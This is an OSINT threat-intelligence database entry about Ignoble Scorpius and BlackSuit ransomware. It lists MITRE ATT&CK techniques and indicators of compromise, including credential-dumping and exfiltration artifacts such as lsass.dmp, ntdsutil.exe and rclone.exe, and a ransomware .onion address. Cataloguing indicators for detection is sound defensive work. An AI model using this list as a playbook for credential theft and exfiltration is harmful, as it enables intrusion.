ioc[.]one - OSINT Cyber Threat Intelligence Database

Ignoble Scorpius, Distributors of BlackSuit Ransomware | #ransomware | #cybercrime | National Cyber Security Consulting

Tags

cmtmf-attack-pattern:	Application Layer Protocol Command And Scripting Interpreter Obfuscated Files Or Information
country:	Japan United States Of America
maec-delivery-vectors:	Watering Hole
attack-pattern:	Data Direct Adversary-In-The-Middle - T1638 Adversary-In-The-Middle - T1557 Application Layer Protocol - T1437 Command And Scripting Interpreter - T1623 Compromise Software Supply Chain - T1195.002 Credentials - T1589.001 Data Encrypted For Impact - T1471 Data Encrypted For Impact - T1486 Dcsync - T1003.006 Disable Or Modify Tools - T1562.001 Exfiltration Over Web Service - T1567 Exfiltration To Cloud Storage - T1567.002 Inhibit System Recovery - T1490 Javascript - T1059.007 Lateral Tool Transfer - T1570 Lsass Memory - T1003.001 Malware - T1587.001 Malware - T1588.001 Obfuscated Files Or Information - T1406 Ntds - T1003.003 Phishing - T1660 Phishing - T1566 Powershell - T1059.001 Regsvr32 - T1218.010 Remote Desktop Protocol - T1021.001 Run Virtual Instance - T1564.006 Rundll32 - T1218.011 Seo Poisoning - T1608.006 Server - T1583.004 Server - T1584.004 Silver Ticket - T1558.002 Smb/Windows Admin Shares - T1021.002 Software - T1592.002 Spearphishing Attachment - T1566.001 Spearphishing Voice - T1566.004 Tool - T1588.002 Standard Application Layer Protocol - T1071 Command-Line Interface - T1059 Credential Dumping - T1003 Exfiltration Over Alternative Protocol - T1048 File And Directory Discovery - T1083 Obfuscated Files Or Information - T1027 Powershell - T1086 Process Discovery - T1057 Rundll32 - T1085 Windows Management Instrumentation - T1047 Valid Accounts - T1078

Show in Graph

Common Information

Type	Value
UUID	fcfb40d4-4767-44ba-8bcb-f73b95aeb5a9
Fingerprint	ac37095905a5c441
Analysis status	DONE
Considered CTI value	2
Text language
Published	Nov. 20, 2024, 1:22 p.m.
Added to db	Nov. 20, 2024, 4:31 p.m.
Last updated	Nov. 20, 2024, 9:29 p.m.
Headline	Ignoble Scorpius, Distributors of BlackSuit Ransomware \| #ransomware \| #cybercrime
Title	Ignoble Scorpius, Distributors of BlackSuit Ransomware \| #ransomware \| #cybercrime \| National Cyber Security Consulting
Detected Hints/Tags/Attributes	158/4/48

Source URLs

	Redirection	Url
Details	Source	https://nationalcybersecurity.com/ignoble-scorpius-distributors-of-blacksuit-ransomware-ransomware-cybercrime/?utm_source=rss&utm_medium=rss&utm_campaign=ignoble-scorpius-distributors-of-blacksuit-ransomware-ransomware-cybercrime

URL Provider

Details	Provider	Source level domain
Details	nationalcybersecurity.com	nationalcybersecurity.com

RSS Feed

Details	Id	Enabled	Feed title	Url	Added to db
Details	6	✔	National Cyber Security Consulting	http://nationalcybersecurity.com/feed/	2024-08-30 22:08

Attributes

Details	Type	#Events	Value
Details	Domain	3	weg7sdx54bevnvulapqu6bpzwztryeflq3s23tegbmnhkbpqz637f2yd.onion
Details	File	1127	svchost.exe
Details	File	18	rstrtmgr.dll
Details	File	1265	explorer.exe
Details	File	38	rclone.exe
Details	File	380	wscript.exe
Details	File	39	lsass.dmp
Details	File	118	taskmgr.exe
Details	File	143	wmiprvse.exe
Details	File	308	services.exe
Details	File	1214	powershell.exe
Details	File	61	ntdsutil.exe
Details	File	128	c:\windows\system32\rundll32.exe
Details	File	19	c:\windows\syswow64\rundll32.exe
Details	File	209	setup.exe
Details	File	2136	cmd.exe
Details	File	347	vssadmin.exe
Details	File	1	enum.sys
Details	File	11	blacksuit.txt
Details	MITRE ATT&CK Techniques	312	T1566.001
Details	MITRE ATT&CK Techniques	13	T1608.006
Details	MITRE ATT&CK Techniques	310	T1078
Details	MITRE ATT&CK Techniques	4	T1566.004
Details	MITRE ATT&CK Techniques	37	T1195.002
Details	MITRE ATT&CK Techniques	175	T1003.001
Details	MITRE ATT&CK Techniques	28	T1003.006
Details	MITRE ATT&CK Techniques	22	T1557
Details	MITRE ATT&CK Techniques	1	T1558.002
Details	MITRE ATT&CK Techniques	69	T1003.003
Details	MITRE ATT&CK Techniques	162	T1021.001
Details	MITRE ATT&CK Techniques	141	T1021.002
Details	MITRE ATT&CK Techniques	119	T1570
Details	MITRE ATT&CK Techniques	300	T1562.001
Details	MITRE ATT&CK Techniques	94	T1048
Details	MITRE ATT&CK Techniques	127	T1567
Details	MITRE ATT&CK Techniques	102	T1567.002
Details	MITRE ATT&CK Techniques	435	T1057
Details	MITRE ATT&CK Techniques	277	T1490
Details	MITRE ATT&CK Techniques	5	T1564.006
Details	MITRE ATT&CK Techniques	312	T1047
Details	MITRE ATT&CK Techniques	45	T1218.010
Details	MITRE ATT&CK Techniques	588	T1083
Details	MITRE ATT&CK Techniques	477	T1486
Details	MITRE ATT&CK Techniques	95	T1059.007
Details	MITRE ATT&CK Techniques	465	T1059.001
Details	MITRE ATT&CK Techniques	449	T1071
Details	MITRE ATT&CK Techniques	632	T1027
Details	Url	1	http://weg7sdx54bevnvulapqu6bpzwztryeflq3s23tegbmnhkbpqz637f2yd.onion/?id=[id]